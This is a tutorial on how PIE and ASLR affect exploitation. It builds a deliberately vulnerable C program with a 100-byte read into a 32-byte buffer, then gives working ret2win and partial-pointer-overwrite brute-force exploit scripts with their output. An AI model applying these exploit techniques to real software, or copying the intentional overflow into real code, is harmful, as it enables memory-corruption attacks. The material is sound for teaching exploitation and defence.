Position Independent Code (PIC) is code that can be loaded at any memory address without modification. Typically, shared libraries are compiled as PIC code so they can be loaded at any base memory address without modification.
This has a couple of benefits; address space collisions don’t occur. I.e two shared libraries won’t have an overlapping virtual address space. In addition, PIC code can benefit from Address Space Layout Randomisation (ASLR) to assist in preventing Return Orientated Programming (ROP) attacks.
A Position Independent Executable (PIE) is a standard executable file (rather than shared library) that can be loaded at any memory address without modification. It is just another form of position independent code.
To demonstrate the effect of PIE on an executable, let’s start with a ret2win challenge. The code is suseptible to a trivial buffer overflow vulnerability. Our objective is to call the auth_success function by overwriting the check_password functions return address.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
void auth_failure()
{
puts("Authentication failed");
}
void auth_success()
{
puts("Authentication succeeded");
}
void check_password() {
char password[32];
unsigned long size = 100;
puts("Password:");
read(0, &password, (unsigned long) size);
if(strcmp(password, "SuperSecret\n") == 0) {
auth_success();
}
else {
auth_failure();
}
}
int main(int argc, char **argv) {
check_password();
return 0;
}
Compile the code without PIE using the following command.
gcc vulnerable.c -o vuln -fno-stack-protector -no-pie
Executing the program using gdb, we can see the auth_success function has the address 0x40115c.
(gdb) disassemble check_password
Dump of assembler code for function check_password:
0x0000000000401172 <+0>: push %rbp
0x0000000000401173 <+1>: mov %rsp,%rbp
0x0000000000401176 <+4>: sub $0x30,%rsp
0x000000000040117a <+8>: movq $0x64,-0x8(%rbp)
0x0000000000401182 <+16>: lea 0xeaa(%rip),%rax # 0x402033
0x0000000000401189 <+23>: mov %rax,%rdi
0x000000000040118c <+26>: call 0x401030 <puts@plt>
0x0000000000401191 <+31>: mov -0x8(%rbp),%rdx
0x0000000000401195 <+35>: lea -0x30(%rbp),%rax
0x0000000000401199 <+39>: mov %rax,%rsi
0x000000000040119c <+42>: mov $0x0,%edi
0x00000000004011a1 <+47>: call 0x401040 <read@plt>
0x00000000004011a6 <+52>: lea -0x30(%rbp),%rax
0x00000000004011aa <+56>: lea 0xe8c(%rip),%rdx # 0x40203d
0x00000000004011b1 <+63>: mov %rdx,%rsi
0x00000000004011b4 <+66>: mov %rax,%rdi
0x00000000004011b7 <+69>: call 0x401050 <strcmp@plt>
0x00000000004011bc <+74>: test %eax,%eax
0x00000000004011be <+76>: jne 0x4011cc <check_password+90>
0x00000000004011c0 <+78>: mov $0x0,%eax
0x00000000004011c5 <+83>: call 0x40115c <auth_success>
0x00000000004011ca <+88>: jmp 0x4011d6 <check_password+100>
0x00000000004011cc <+90>: mov $0x0,%eax
0x00000000004011d1 <+95>: call 0x401146 <auth_failure>
0x00000000004011d6 <+100>: nop
0x00000000004011d7 <+101>: leave
0x00000000004011d8 <+102>: ret
Restarting the program several times, we can see the address is always 0x40115c.
(gdb) p auth_success
$3 = {<text variable, no debug info>} 0x40115c <auth_success>
Since our code is vulnerable to a buffer overflow, we can overwrite the return address with a value of our choosing, such as the auth_success function address.
binary_data = b''
binary_data += b'A'*56
binary_data += b"\x5c\x11\x40" #0x40115c
with open('output.bin', 'wb') as f:
f.write(binary_data)
print("Binary data written to 'output.bin'")
Running the code, we can see authentication initially fails due to our entered string not matching the required value, but then the auth_success is executed when returning from the check_password function.
┌──(kali㉿kali)-[~]
└─$ python3 exploit.py
Binary data written to 'output.bin'
┌──(kali㉿kali)-[~]
└─$ cat output.bin| ./vuln
Password:
Authentication failed
Authentication succeeded
Enabling PIE
Let’s recompile our code, but this time enable PIE.
gcc vulnerable.c -o vuln -fno-stack-protector -pie
We can use checksec to verify that PIE is enabled on this executable.
checksec --file=./vuln
RELRO STACK CANARY NX PIE RPATH RUNPATH Symbols FORTIFY Fortified Fortifiable FILE
Partial RELRO No canary found NX enabled PIE enabled No RPATH No RUNPATH 41 Symbols No 0 1 ./vuln
On running the application in gdb, we can see the address of auth_success has changed but remains the same on each application restart.
(gdb) p auth_success
$1 = {<text variable, no debug info>} 0x55555555516f <auth_success>
(gdb) p auth_success
$1 = {<text variable, no debug info>} 0x55555555516f <auth_success>
(gdb) p auth_success
$1 = {<text variable, no debug info>} 0x55555555516f <auth_success>
This is because gdb disables ASLR in debugging sessions. We can re-enable it using;
(gdb) set disable-randomization off
(gdb) show disable-randomization
Disabling randomization of debuggee's virtual address space is off.
We can now see the PIE executable addresses are being randomised by ASLR.
(gdb) p auth_success
$1 = {<text variable, no debug info>} 0x55570fa1a16f <auth_success>
(gdb) p auth_success
$1 = {<text variable, no debug info>} 0x564ea188a16f <auth_success>
(gdb) p auth_success
$1 = {<text variable, no debug info>} 0x55fad605116f <auth_success>
However, we can observe that the least significant bytes in the address stay the same (0x16f). Little endian CPU’s including the Intel x64 systems use reverse byte ordering. As such, if we partially overwrite the instruction pointer (RIP) this will only overwrite the least significant bytes at the end of the string leaving the randomised bytes as they are.
We still have a slight amount of randomisation in terms of the value preceeding 0x16f, but we can set that the 0x1 and attempt authentication multiple times. This is demonstrated in the below code, where we perform a partial pointer overwrite attack.
#!/usr/bin/python
from struct import *
from pwn import *
binary_data = b''
binary_data += b'A'*56
binary_data += b"\x6f\x11"
for x in range(50):
try:
elf = ELF('./vuln')
p = process("./vuln")
payload = binary_data
p.recvuntil(b'Password:\n')
p.send(payload)
p.recvline()
response = p.recvline()
if "succeeded" in str(response):
print("SUCCESS")
print(str(response))
break
except:
pass
Running it shows in this instance it took 4 attempts before the correct address was identified.
python3 pie_exploit.py
[*] '/home/kali/vuln'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
Stripped: No
[+] Starting local process './vuln': pid 4162
[+] Starting local process './vuln': pid 4164
[+] Starting local process './vuln': pid 4166
[+] Starting local process './vuln': pid 4168
SUCCESS
b'Authentication succeeded\n'
[*] Stopped process './vuln' (pid 4168)
[*] Process './vuln' stopped with exit code -11 (SIGSEGV) (pid 4166)
[*] Process './vuln' stopped with exit code -11 (SIGSEGV) (pid 4164)
[*] Process './vuln' stopped with exit code -11 (SIGSEGV) (pid 4162)
If overwriting the stack pointer in this manner isn’t viable, you would need a method of leaking valid stack addresses via another vulnerability such as format string exploitation.
Why are the addresses not fully randomised?
The base address of a PIE executable will always end in 0x1000, since the address needs to be aligned to a page boundary. By default, this is 0x1000 (4096 in decimal). The getconf command will show the default page size on your system.
getconf PAGESIZE
4096
The info proc mappings command in gdb will also confirm this behavior.
(gdb) info proc mappings
process 26826
Mapped address spaces:
Start Addr End Addr Size Offset Perms objfile
0x555555554000 0x555555555000 0x1000 0x0 r--p /home/kali/vuln
0x555555555000 0x555555556000 0x1000 0x1000 r-xp /home/kali/vuln
0x555555556000 0x555555557000 0x1000 0x2000 r--p /home/kali/vuln
0x555555557000 0x555555558000 0x1000 0x2000 r--p /home/kali/vuln
0x555555558000 0x555555559000 0x1000 0x3000 rw-p /home/kali/vuln
In Conclusion
PIE does have a performance impact, although this is fairly negligible on modern systems. As such, a number of Linux distributions have started enabling it by default.
The main benefit of PIE is that it allows for Address Space Layout Randomization (ASLR), which makes it harder for attackers to exploit known memory vulnerabilities. By randomizing the memory layout, attackers can’t predict where functions, buffers, or other data reside.